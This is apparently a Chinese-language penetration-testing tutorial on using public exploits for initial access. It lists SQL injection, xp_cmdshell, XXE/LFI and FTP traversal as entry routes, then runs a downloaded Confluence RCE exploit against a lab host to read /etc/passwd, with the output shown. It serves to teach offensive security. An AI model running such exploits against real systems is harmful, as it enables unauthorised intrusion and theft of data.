# 利用公开exp

## **利用公开exp**

搜集完信息之后，我们已经了解了目标公司开放了哪些公共服务，如果运气好，这些开放的公共服务具有高危漏洞，且这些高危漏洞存在公开exp，例如Confluence RCE漏洞。这样的话，我们就能突破到内部网络了。但并非只有 RCE 漏洞能给予我们突破口，组合利用一些威胁程度相对低一些的漏洞也可能为我们带来突破，常见的一些情况如下

1：利用SQL注入漏洞提取凭证，绕过登陆或者密码重用。  
2：利用 SQL Server 的 SQL 注入漏洞通过xp\_cmdshell执行远程代码。  
3：利用 XXE/LFI 等漏洞读取包含敏感信息的配置文件，例如包含明文帐号密码。然后绕过登陆或者密码重用。  
4：不仅仅 Web 漏洞可以为我们提供突破口。FTP 也可以存在目录遍历漏洞，提取敏感文件。

对于利用公开exp，最重要的一点在于确定公共服务的版本，因为一个漏洞往往只影响特定的几个版本，但也不总是这样。有的时候，一个漏洞早已存在，但在数个版本之后才被发现和披露。又或者，漏洞被披露了，但开发者未修复或者未能成功修复。无论如何，exp 对应的版本和目标公共服务的版本越匹配，成功率就越大。如果实在难以找到特定服务的版本，可以推测目标是否经常更新。例如，该目标的其他服务版本都比较及时地更新了，都更新到2022年年初的版本了，那么该服务很可能是较新的版本，可以优先试试最近的漏洞。反之，可以尝试久远一些的漏洞。

对于具有公开 exp 的漏洞，我们可以在 Kali 自带的 searchsploit 上查询，每次使用前记得及时更新。更新后的searchsploit数据与exploit-db 一致。除此之外，我们还可以在github，packetstorm ([https://packetstormsecurity.com/)](https://packetstormsecurity.com/)) 等平台寻找exp。

##### **Exploit-DB**

[![image.png](http://raven-medicine.com/uploads/images/gallery/2022-09/scaled-1680-/vidimage.png)](http://raven-medicine.com/uploads/images/gallery/2022-09/vidimage.png)

##### **Github**

[![image.png](http://raven-medicine.com/uploads/images/gallery/2022-09/scaled-1680-/AUeimage.png)](http://raven-medicine.com/uploads/images/gallery/2022-09/AUeimage.png)

##### **Packet Storm**

[![image.png](https://raven-medicine.com/uploads/images/gallery/2023-02/scaled-1680-/8IxEzyt8pnnfNHnd-image.png)](https://raven-medicine.com/uploads/images/gallery/2023-02/8IxEzyt8pnnfNHnd-image.png)

我们之前发现 **raven-medicine.org:8090** 运行着 Confluence 应用，版本是 **7.13.6**，与 CVE 所列举的版本范围吻合

[![image.png](https://raven-medicine.com/uploads/images/gallery/2023-02/scaled-1680-/7pUVKewA3oSEPdJ1-image.png)](https://raven-medicine.com/uploads/images/gallery/2023-02/7pUVKewA3oSEPdJ1-image.png)

[![image.png](https://raven-medicine.com/uploads/images/gallery/2023-02/scaled-1680-/FUYPEK0U8HDCVe2V-image.png)](https://raven-medicine.com/uploads/images/gallery/2023-02/FUYPEK0U8HDCVe2V-image.png)

我们从 Github 上下载了一个 exp，对目标进行验证，成功地执行了远程代码：

[![image.png](https://raven-medicine.com/uploads/images/gallery/2023-02/scaled-1680-/77GIabkSIlUPdhSp-image.png)](https://raven-medicine.com/uploads/images/gallery/2023-02/77GIabkSIlUPdhSp-image.png)

```
└─# python3 exp.py http://raven-medicine.org:8090 'cat /etc/passwd'
Confluence target version: 7.13.6
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin confluence:x:2002:2002::/var/atlassian/application-data/confluence:/bin/bash 
```